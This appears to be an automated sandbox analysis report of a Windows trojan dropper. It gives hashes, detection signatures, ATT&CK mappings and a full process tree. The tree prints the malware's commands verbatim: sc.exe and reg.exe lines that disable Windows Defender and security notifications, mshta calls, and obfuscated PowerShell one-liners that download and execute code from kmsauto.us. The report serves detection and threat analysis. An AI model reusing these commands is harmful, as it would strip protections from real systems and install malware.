2181fc561eed3985e3f6922bfc50bb1a761377874ab0e86344bdc74505ed8f5c

General

Target

006b91eb_IHyB_31ECD.exe
Size

1010KB
MD5

006b91eb6fe52d68af0c7e6b6ee0cdf5
SHA1

a797f0062757264d9ed96fb16dbbe1f997891cb4
SHA256

2181fc561eed3985e3f6922bfc50bb1a761377874ab0e86344bdc74505ed8f5c
SHA512

3318ae6b954591db13537c8c04630a9914cdd51bfd4ef7c372f7bfb2cd33f572d06041ed99b97ed44796a3654891e444598ab15a102d86efa7ae9a80afccc634

Score

10^/10

evasion suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://kmsauto.us/ra/ALL.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://kmsauto.us/ALL.txt

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
suricata: ET MALWARE PE EXE or DLL Windows file download Text
suricata: ET MALWARE PE EXE or DLL Windows file download Text
suricata
Blocklisted process makes network request 6 IoCs

Processes:

mshta.exemshta.exepowershell.exepowershell.exe

flow pid process

34 184 mshta.exe
35 3048 mshta.exe
37 2728 powershell.exe
36 200 powershell.exe
43 200 powershell.exe
44 200 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

dUQ6DNFx.comwtEqAa2o.com6SaekadA.com

pid process

3252 dUQ6DNFx.com
3280 wtEqAa2o.com
3884 6SaekadA.com
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1516 200 WerFault.exe powershell.exe
2816 2728 WerFault.exe powershell.exe

flow	pid	process
34	184	mshta.exe
35	3048	mshta.exe
37	2728	powershell.exe
36	200	powershell.exe
43	200	powershell.exe
44	200	powershell.exe

pid	process
3252	dUQ6DNFx.com
3280	wtEqAa2o.com
3884	6SaekadA.com

pid	pid_target	process	target process
1516	200	WerFault.exe	powershell.exe
2816	2728	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

powershell.exepowershell.exeWerFault.exeWerFault.exe

pid	process
200	powershell.exe
2728	powershell.exe
200	powershell.exe
2728	powershell.exe
200	powershell.exe
2728	powershell.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe
2816	WerFault.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exeWerFault.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	200	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeDebugPrivilege	1516	WerFault.exe
Token: SeDebugPrivilege	2816	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

006b91eb_IHyB_31ECD.exewtEqAa2o.comdUQ6DNFx.comcmd.exe6SaekadA.comcmd.exe

description	pid	process	target process
PID 808 wrote to memory of 3252	808	006b91eb_IHyB_31ECD.exe	dUQ6DNFx.com
PID 808 wrote to memory of 3252	808	006b91eb_IHyB_31ECD.exe	dUQ6DNFx.com
PID 808 wrote to memory of 3252	808	006b91eb_IHyB_31ECD.exe	dUQ6DNFx.com
PID 808 wrote to memory of 3280	808	006b91eb_IHyB_31ECD.exe	wtEqAa2o.com
PID 808 wrote to memory of 3280	808	006b91eb_IHyB_31ECD.exe	wtEqAa2o.com
PID 3280 wrote to memory of 184	3280	wtEqAa2o.com	mshta.exe
PID 3280 wrote to memory of 184	3280	wtEqAa2o.com	mshta.exe
PID 3252 wrote to memory of 2404	3252	dUQ6DNFx.com	cmd.exe
PID 3252 wrote to memory of 2404	3252	dUQ6DNFx.com	cmd.exe
PID 2404 wrote to memory of 1856	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 1856	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 3992	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 3992	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 2804	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 2804	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 2200	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 2200	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 2308	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 2308	2404	cmd.exe	sc.exe
PID 2404 wrote to memory of 2164	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2164	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 3752	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 3752	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2240	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2240	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2176	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2176	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1016	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1016	2404	cmd.exe	reg.exe
PID 808 wrote to memory of 3884	808	006b91eb_IHyB_31ECD.exe	6SaekadA.com
PID 808 wrote to memory of 3884	808	006b91eb_IHyB_31ECD.exe	6SaekadA.com
PID 2404 wrote to memory of 2256	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2256	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2272	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2272	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 3036	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 3036	2404	cmd.exe	reg.exe
PID 3884 wrote to memory of 3048	3884	6SaekadA.com	mshta.exe
PID 3884 wrote to memory of 3048	3884	6SaekadA.com	mshta.exe
PID 2404 wrote to memory of 3936	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 3936	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 764	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 764	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 60	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 60	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1664	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1664	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1600	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1600	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1604	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1604	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1176	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1176	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2244	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 2244	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 768	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 768	2404	cmd.exe	cmd.exe
PID 768 wrote to memory of 1172	768	cmd.exe	reg.exe
PID 768 wrote to memory of 1172	768	cmd.exe	reg.exe
PID 768 wrote to memory of 3648	768	cmd.exe	find.exe
PID 768 wrote to memory of 3648	768	cmd.exe	find.exe
PID 2404 wrote to memory of 1328	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 1328	2404	cmd.exe	reg.exe
PID 2404 wrote to memory of 3848	2404	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe
"C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:808

C:\Users\Admin\AppData\Local\Temp\dUQ6DNFx.com
"C:\Users\Admin\AppData\Local\Temp\dUQ6DNFx.com"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3252

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C809.tmp\C80A.tmp\C80B.bat C:\Users\Admin\AppData\Local\Temp\dUQ6DNFx.com"
3⤵
- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
4⤵
PID:1856

C:\Windows\system32\sc.exe
sc config SecurityHealthService start=disabled
4⤵
PID:3992

C:\Windows\system32\sc.exe
sc config Sense start=disabled
4⤵
PID:2804

C:\Windows\system32\sc.exe
sc config WdNisDrv start=disabled
4⤵
PID:2200

C:\Windows\system32\sc.exe
sc config WdNisSvc start=disabled
4⤵
PID:2308

C:\Windows\system32\reg.exe
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:2164

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:3752

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:2240

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:2176

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:1016

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
4⤵
PID:2256

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
4⤵
PID:2272

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:3036

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:3936

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
PID:764

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
PID:60

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
PID:1664

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:1600

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
4⤵
PID:1604

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:1176

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:2244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
4⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\system32\find.exe
find /i "SecHealthUI"
5⤵
PID:3648

C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
5⤵
PID:1172

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
4⤵
PID:1328

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-1594587808-2047097707-2163810515-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
4⤵
PID:3848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
4⤵
PID:1788

C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
5⤵
PID:2272

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f
4⤵
PID:3036

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f
4⤵
PID:640

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
4⤵
PID:3916

C:\Users\Admin\AppData\Local\Temp\wtEqAa2o.com
"C:\Users\Admin\AppData\Local\Temp\wtEqAa2o.com"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3280

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
3⤵
- Blocklisted process makes network request
PID:184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2728 -s 2524
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Users\Admin\AppData\Local\Temp\6SaekadA.com
"C:\Users\Admin\AppData\Local\Temp\6SaekadA.com"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3884

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
3⤵
- Blocklisted process makes network request
PID:3048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:200

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 200 -s 2476
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Disabling Security Tools

1

T1089

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6SaekadA.com
MD5
b48dea0c642487df2482ab8fa55bb923

SHA1
50b00f687892a656319aefcecba535459e2d8a2d

SHA256
0dfe7a93ff40834c072c7fdd9381771b1086b67f545fa83c766b2d67a911e47b

SHA512
2b57678d9817fbc42c5d2f9e8b2cf0ff12b67882cc18e624422857be950810a4ea63c857700d7cf5a91ea66ed6a5074a3bfab6eff883c66457db8c611bde6e16

Download Submit
C:\Users\Admin\AppData\Local\Temp\6SaekadA.com
MD5
b48dea0c642487df2482ab8fa55bb923

SHA1
50b00f687892a656319aefcecba535459e2d8a2d

SHA256
0dfe7a93ff40834c072c7fdd9381771b1086b67f545fa83c766b2d67a911e47b

SHA512
2b57678d9817fbc42c5d2f9e8b2cf0ff12b67882cc18e624422857be950810a4ea63c857700d7cf5a91ea66ed6a5074a3bfab6eff883c66457db8c611bde6e16

Download Submit
C:\Users\Admin\AppData\Local\Temp\C809.tmp\C80A.tmp\C80B.bat
MD5
4daac34f17ecb3f09ce92bf60d62144a

SHA1
73898316bf67ab815528d4996e7f04185297baa8

SHA256
3f4f8c7e86bcc0432e2835771ae63fbc2b226be760c3190a96dcbe453cbbcb9d

SHA512
09f5fc715324dae244c229673cc2a86e93ade56ecd841c1b430389322b6e6d259debd852cb1d6b260c2a27aa2086f16d16ca9be81b1ac69ecbb0ea1c399a0bd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\dUQ6DNFx.com
MD5
1f460870b7a0a5979925cef15b0ca8ee

SHA1
4c5ac8f5ead53e0ba504c20c238e8f9fb3e435e6

SHA256
7f1db23c8550c2baf0fc007b2ebf7532ceacb3e8f38d8edfb29b250c6fed5273

SHA512
909826c719b23b4efd37fb53b0700394c398ff8da75f46833c70db16081121d22fd573c4133723f45c71f0b377ad458764140484329f07360a643263ac0ff2c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\dUQ6DNFx.com
MD5
1f460870b7a0a5979925cef15b0ca8ee

SHA1
4c5ac8f5ead53e0ba504c20c238e8f9fb3e435e6

SHA256
7f1db23c8550c2baf0fc007b2ebf7532ceacb3e8f38d8edfb29b250c6fed5273

SHA512
909826c719b23b4efd37fb53b0700394c398ff8da75f46833c70db16081121d22fd573c4133723f45c71f0b377ad458764140484329f07360a643263ac0ff2c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\wtEqAa2o.com
MD5
d38aea02881ff45b60e6b2c11cd44916

SHA1
ab4d6992c292931c297ca55d3d2ee34df64b7f7b

SHA256
aa7ff8badcffdff66df6d30bde51b6e3c960be0a3719b73d3875af8e1173bd94

SHA512
c42fc67b08e130e2ea188328c7dbb69be6ae8c575cb79301117bbc22c4b292c59e0f186e25443e394fa36b34122c347c32e85d73716949812c3798880071ee7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\wtEqAa2o.com
MD5
d38aea02881ff45b60e6b2c11cd44916

SHA1
ab4d6992c292931c297ca55d3d2ee34df64b7f7b

SHA256
aa7ff8badcffdff66df6d30bde51b6e3c960be0a3719b73d3875af8e1173bd94

SHA512
c42fc67b08e130e2ea188328c7dbb69be6ae8c575cb79301117bbc22c4b292c59e0f186e25443e394fa36b34122c347c32e85d73716949812c3798880071ee7f

Download Submit
C:\Users\Public\ Microsoft.ps1
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/60-148-0x0000000000000000-mapping.dmp

Download
memory/184-122-0x0000000000000000-mapping.dmp

Download
memory/200-175-0x0000020CFCC30000-0x0000020CFCC31000-memory.dmp

Filesize
4KB

Download
memory/200-190-0x0000020CFC1F0000-0x0000020CFC1F2000-memory.dmp

Filesize
8KB

Download
memory/200-222-0x0000020CFCD70000-0x0000020CFCD8F000-memory.dmp

Filesize
124KB

Download
memory/200-182-0x0000020CFCDE0000-0x0000020CFCDE1000-memory.dmp

Filesize
4KB

Download
memory/200-193-0x0000020CFC1F3000-0x0000020CFC1F5000-memory.dmp

Filesize
8KB

Download
memory/200-164-0x0000000000000000-mapping.dmp

Download
memory/200-198-0x0000020CFC1F6000-0x0000020CFC1F8000-memory.dmp

Filesize
8KB

Download
memory/640-162-0x0000000000000000-mapping.dmp

Download
memory/764-146-0x0000000000000000-mapping.dmp

Download
memory/768-154-0x0000000000000000-mapping.dmp

Download
memory/1016-135-0x0000000000000000-mapping.dmp

Download
memory/1172-155-0x0000000000000000-mapping.dmp

Download
memory/1176-152-0x0000000000000000-mapping.dmp

Download
memory/1328-157-0x0000000000000000-mapping.dmp

Download
memory/1600-150-0x0000000000000000-mapping.dmp

Download
memory/1604-151-0x0000000000000000-mapping.dmp

Download
memory/1664-149-0x0000000000000000-mapping.dmp

Download
memory/1788-159-0x0000000000000000-mapping.dmp

Download
memory/1856-125-0x0000000000000000-mapping.dmp

Download
memory/2164-130-0x0000000000000000-mapping.dmp

Download
memory/2176-134-0x0000000000000000-mapping.dmp

Download
memory/2200-128-0x0000000000000000-mapping.dmp

Download
memory/2240-133-0x0000000000000000-mapping.dmp

Download
memory/2244-153-0x0000000000000000-mapping.dmp

Download
memory/2256-139-0x0000000000000000-mapping.dmp

Download
memory/2272-160-0x0000000000000000-mapping.dmp

Download
memory/2272-142-0x0000000000000000-mapping.dmp

Download
memory/2308-129-0x0000000000000000-mapping.dmp

Download
memory/2404-123-0x0000000000000000-mapping.dmp

Download
memory/2728-165-0x0000000000000000-mapping.dmp

Download
memory/2728-191-0x0000026DC0E10000-0x0000026DC0E12000-memory.dmp

Filesize
8KB

Download
memory/2728-197-0x0000026DC0E16000-0x0000026DC0E18000-memory.dmp

Filesize
8KB

Download
memory/2728-192-0x0000026DC0E13000-0x0000026DC0E15000-memory.dmp

Filesize
8KB

Download
memory/2804-127-0x0000000000000000-mapping.dmp

Download
memory/3036-143-0x0000000000000000-mapping.dmp

Download
memory/3036-161-0x0000000000000000-mapping.dmp

Download
memory/3048-144-0x0000000000000000-mapping.dmp

Download
memory/3252-114-0x0000000000000000-mapping.dmp

Download
memory/3280-117-0x0000000000000000-mapping.dmp

Download
memory/3280-120-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

Filesize
4KB

Download
memory/3648-156-0x0000000000000000-mapping.dmp

Download
memory/3752-131-0x0000000000000000-mapping.dmp

Download
memory/3848-158-0x0000000000000000-mapping.dmp

Download
memory/3884-136-0x0000000000000000-mapping.dmp

Download
memory/3884-140-0x0000000000280000-0x0000000000281000-memory.dmp

Filesize
4KB

Download
memory/3916-163-0x0000000000000000-mapping.dmp

Download
memory/3936-145-0x0000000000000000-mapping.dmp

Download
memory/3992-126-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads